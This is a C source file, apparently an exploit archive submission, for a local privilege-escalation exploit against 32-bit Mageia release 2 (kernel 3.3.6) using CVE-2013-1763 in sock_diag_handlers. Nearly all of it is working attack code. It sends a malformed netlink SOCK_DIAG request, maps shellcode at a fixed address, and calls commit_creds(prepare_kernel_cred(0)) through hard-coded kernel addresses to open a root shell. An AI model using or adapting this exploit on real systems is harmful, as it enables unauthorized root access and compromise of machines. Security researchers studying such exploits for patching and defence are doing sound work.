|
/* Exploit Title: Mageia release 2 (32bit) sock_diag_handlers Local root exploit
Date: 22-03-2013
Exploit Author: y3dips@echo.or.id | @y3dips
Vendor Homepage: http://www.mageia.org/en/
Software Link: http://www.mageia.org/en/downloads/
Version: Mageia release 2 Kernel 3.3.6-desktop586-2.mga2 i686
Tested on: Mageia release 2 Kernel 3.3.6-desktop586-2.mga2 i686
CVE : 2013-1763 */
#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <netinet/tcp.h>
#include <errno.h>
#include <linux/if.h>
#include <linux/filter.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <linux/sock_diag.h>
#include <linux/inet_diag.h>
#include <linux/unix_diag.h>
#include <sys/mman.h>
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;
int __attribute__((regparm(3)))
kcode()
{
commit_creds(prepare_kernel_cred(0));
return -1;
}
char loncat[] = "\x55\x89\xe5\xb8\x3c\x87\x04\x08\xff\xd0\x5d\xc3\x55\x89\xe5\x81\xec\x58\x02";
/*asm("mov $kcode, %eax; call %eax");*/
int trigger() {
int socks;
unsigned long mmap_start = 0x10000;
unsigned long mmap_size= 0x120000;
void *payload;
struct {
struct nlmsghdr nlh;
struct unix_diag_req r;
} req;
socks = socket(PF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG);
if (socks < 0)
{ printf("[+] Can't create sock diag socket...\n");
return -1; }
memset(&req, 0, sizeof(req));
req.nlh.nlmsg_len = sizeof(req);
req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
req.nlh.nlmsg_flags = NLM_F_REQUEST;
req.r.sdiag_family = 185; /*nl_table-sock_diag_handlers/4*/
payload=mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0);
if ((long)payload == -1)
{ printf("[+] Failed to mmap() at target.\n");
return -1; }
*(unsigned long *)&loncat[4] =(unsigned long)kcode;
memset((void *)mmap_start, 0x90, mmap_size);
memcpy((void *)mmap_start+mmap_size-sizeof(loncat), loncat, sizeof(loncat));
send(socks, &req, sizeof(req), 0);
}
int main()
{
printf("[+] Mageia release 2 (32bit) sock_diag_handlers Local root exploit\n");
/* Mageia release 2 Kernel 3.3.6-desktop586-2.mga2 i686*/
commit_creds = (_commit_creds) 0xc0159cd0;
prepare_kernel_cred = (_prepare_kernel_cred) 0xc0159ed0;
printf("[+] Triggering payload and Exploiting Sockz...\n");
trigger();
if(getuid()) {
printf("[+] Exploit Failed...\n");
return -1;
}
printf("[+] Got root!...\n");
execl("/bin/sh", "/bin/sh", NULL);
}
|